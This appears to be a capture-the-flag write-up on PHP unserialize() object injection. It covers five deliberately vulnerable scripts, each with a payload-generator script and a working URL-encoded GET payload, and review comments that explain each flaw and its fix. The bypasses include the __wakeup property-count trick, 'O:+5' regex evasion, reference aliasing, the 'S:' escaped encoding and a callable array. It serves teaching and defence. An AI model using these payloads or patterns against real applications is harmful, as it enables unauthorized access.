unserialize / serialize

example 1

<?php
class SoFun{
// Relative filename displayed when the object is destroyed; defaults to this script.
protected $file='index.php';
// Runs when the object is released — including objects that unserialize() created.
function __destruct(){
if(!empty($this->file)) {
// Rejects any backslash or slash so only a bare filename in this directory is shown.
if(strchr($this-> file,"\\")===false && strchr($this->file, '/')===false)
show_source(dirname (__FILE__).'/'.$this ->file);
else
die('Wrong filename.');
}
}
// Meant to neutralise deserialized objects by forcing the default filename.
// NOTE(review): this is the only guard, and the write-up below shows it can be
// skipped, so it cannot be relied on as the sole defence against unserialize().
function __wakeup(){
$this->file='index.php';
}
}
if (!isset($_GET['tryhackme'])){
// No parameter supplied: print this file's own source (the challenge hand-out).
show_source(__FILE__);
}
else{
$a=$_GET['tryhackme'];
// NOTE(review): unserialize() on request input lets the client choose which loaded
// class is instantiated and which magic methods (__wakeup/__destruct) run. A
// non-object format such as json_decode(), or
// unserialize($a, ['allowed_classes' => false]), removes that surface.
unserialize($a);
}
?>

Write a new PHP script to produce the encoded payload

<?php
class SoFun{
// Same class and property name as the target, but pointed at flag.php so the
// serialized text carries that filename.
protected $file='flag.php';
}
// Emit the URL-encoded serialized form of a SoFun whose $file is "flag.php".
echo urlencode(serialize(new SoFun()));
?>

GET /un1.php?tryhackme=O%3A5%3A%22SoFun%22%3A1%3A%7Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A8%3A%22flag.php%22%3B%7D — to see the flag, change `O:5:"SoFun":1:{s:7:"\0*\0file";s:8:"flag.php";}` to `O:5:"SoFun":2:{s:7:"\0*\0file";s:8:"flag.php";}` (the `\0` bytes appear as `%00` once URL-encoded), which stops `__wakeup()` from executing: GET /un1.php?tryhackme=O%3A5%3A%22SoFun%22%3A%3A%7Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A8%3A%22flag.php%22%3B%7D

example 2

<?php
// Presumably defines $flag, which __wakeup() echoes; the file is not shown here.
include "flag.php";
class funny{
// Called automatically after unserialize() rebuilds an instance; prints the flag.
function __wakeup(){
global $flag;
echo $flag;
}
}
if (isset($_GET['tryhackme'])){
$a = $_GET['tryhackme'];
// Denylist on the serialized text: rejects object/class tokens such as "O:5:".
// NOTE(review): a regex over the wire format is a weak boundary — the parser
// accepts spellings the pattern does not (the write-up below shows "O:+5:").
// If untrusted data must be unserialized at all, constrain the parser itself
// with unserialize($a, ['allowed_classes' => false]) instead of filtering text.
if(preg_match('/[oc]:\d+:/i', $a)){
die("NONONO!");
} else {
unserialize($a);
}
} else {
show_source(__FILE__);
}
<?php
class funny{
// Empty stand-in: only the class name is needed to produce the serialized form.
}
// Print the serialized form of an empty funny instance.
echo serialize(new funny());
?>

Change `O:5:"funny":0:{}` to `O:+5:"funny":0:{}`, which the `/[oc]:\d+:/i` check does not match, and URL-encode it: GET /un2.php?tryhackme=O%3A%2B5%3A%22funny%22%3A0%3A%7B%7D

example 3

<!-- un3.php -->
<?php
// Presumably defines $flag and $nobodyknow, which __wakeup() reads; not shown here.
include "flag.php";
class funny{
// Overwritten from $nobodyknow in __wakeup(); the payload's value is never read.
private $password;
// Value the caller supplies for comparison against the secret.
public $verify;
// Runs right after unserialize() restores the object.
function __wakeup(){
global $nobodyknow;
global $flag;
$this->password = $nobodyknow;
// NOTE(review): both operands live in the deserialized object, so the payload
// decides how they relate (PHP serialization can make one property a
// reference to another). Comparing the secret without first writing it into
// the object, `if ($nobodyknow === $this->verify)`, is not affected by aliasing.
if ($this->password === $this->verify){
echo $flag;
} else {
echo "Hacking??!";
}
}
}
if (isset($_GET['tryhackme'])){
$a = $_GET['tryhackme'];
// NOTE(review): unserialize() on request input hands the client control of the
// object graph, including property references; json_decode() or
// unserialize($a, ['allowed_classes' => false]) would remove the object surface.
unserialize($a);
} else {
show_source(__FILE__);
}
?>

Construction: `$o->verify = &$o->password;` // when building the object this way, the `password` property must be changed to public

class funny{
// Declared private so the property name serializes mangled, like the target's.
private $password;
public $verify;
// Bind verify as a reference to password so serialize() emits it as a
// back-reference (R:) rather than a separate value.
function __construct(){
$this->verify = &$this->password;
}
}
// Serialize once, then print both the raw and the URL-encoded form.
$payload = serialize(new funny());
echo $payload;
echo urlencode($payload);

GET /un3.php?tryhackme=O%3A5%3A%22funny%22%3A2%3A%7Bs%3A15%3A%22%00funny%00password%22%3BN%3Bs%3A6%3A%22verify%22%3BR%3A2%3B%7D

example 4

<?php
// Presumably defines $flag, which __destruct() echoes; the file is not shown here.
include "flag.php";
class funny{
// Private: serialize() writes it under the mangled name "\0funny\0a".
private $a;
// Sets the expected value on normal construction; unserialize() does not call __construct().
function __construct() {
$this->a = "givemeflag";
}
// Prints the flag when the object is released with $a still equal to "givemeflag".
function __destruct() {
global $flag;
if ($this->a === "givemeflag") {
echo $flag;
}
}
}
if (isset($_GET['tryhackme']) && is_string($_GET['tryhackme'])){
$a = $_GET['tryhackme'];
// Reject any byte outside printable ASCII (0x20-0x7E), which blocks the raw
// NUL bytes that private-property names carry in the default "s:" encoding.
for($i=0;$i<strlen($a);$i++){
if (ord($a[$i]) < 32 || ord($a[$i]) > 126) {
die("hacker!");
}
}
// NOTE(review): the byte filter constrains the wire text, not the decoded
// values — the escaped string form ("S:") spells arbitrary bytes in printable
// ASCII, as the write-up below demonstrates. Filtering the encoding is not a
// substitute for not deserializing untrusted input.
unserialize($a);
} else {
show_source(__FILE__);
}
class funny{
// Private, so serialize() mangles the name with NUL bytes around the class name.
private $a;
// Set the value the target's __destruct() compares against.
function __construct() {
$this->a = "givemeflag";
}
}
// Serialize once, then print both the raw and the URL-encoded form.
$payload = serialize(new funny());
echo $payload;
echo urlencode($payload);

Change `O:5:"funny":1:{s:8:"\0funny\0a";s:10:"givemeflag";}` (the `\0` bytes are invisible in the printed output) to `O:5:"funny":1:{S:8:"\00funny\00a";s:10:"givemeflag";}` and URL-encode it: GET /un5.php?tryhackme=O%3A5%3A%22funny%22%3A1%3A%7BS%3A8%3A%22%5C00funny%5C00a%22%3Bs%3A10%3A%22givemeflag%22%3B%7D

example 5

<!-- un6.php -->
<?php
// Presumably defines $flag, which pyflag() echoes; the file is not shown here.
include "flag.php";
// Surface every error in the response (challenge convenience, not a production setting).
ini_set('display_errors',true);
error_reporting(E_ALL | E_STRICT);
class funny{
// Ordinary public method; nothing here restricts who may invoke it.
public function pyflag(){
global $flag;
echo $flag;
}
}
if (isset($_GET['tryhackme']) && is_string($_GET['tryhackme'])){
$a = unserialize($_GET['tryhackme']);
var_dump($a);
// NOTE(review): invoking the deserialized value as a callable lets the request
// pick any callable form PHP accepts, including [object, 'method'] pairs, so
// the caller chooses the class and method that run. Dispatching through a
// fixed allowlist of method names, rather than calling $a directly, bounds this.
$a();
} else {
show_source(__FILE__);
}
?>
class funny{} // Empty stand-in: only the class name is needed for serialize().
// Serialize an [object, method-name] pair once, then print raw and URL-encoded forms.
$payload = serialize([new funny(), "pyflag"]);
echo $payload;
echo urlencode($payload);

GET /un6.php?tryhackme=a%3A2%3A%7Bi%3A0%3BO%3A5%3A%22funny%22%3A0%3A%7B%7Di%3A1%3Bs%3A6%3A%22pyflag%22%3B%7D